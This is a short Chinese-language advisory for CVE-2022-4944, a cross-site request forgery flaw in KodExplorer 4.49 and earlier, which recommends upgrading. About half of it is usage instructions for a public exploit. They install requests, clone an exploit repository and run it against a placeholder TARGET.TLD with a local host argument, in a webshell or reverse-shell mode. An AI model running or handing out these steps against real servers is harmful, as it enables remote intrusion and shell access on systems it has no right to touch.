
在 kalcaddle KodExplorer 4.49 及之前版本中发现了一个被归类为问题性的漏洞。该漏洞影响未知部分。该操作导致跨站请求伪造。该漏洞被唯一标识为 CVE-2022-4944。攻击者可以远程发起攻击。此外,已有漏洞利用代码可用。建议升级受影响的组件。

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode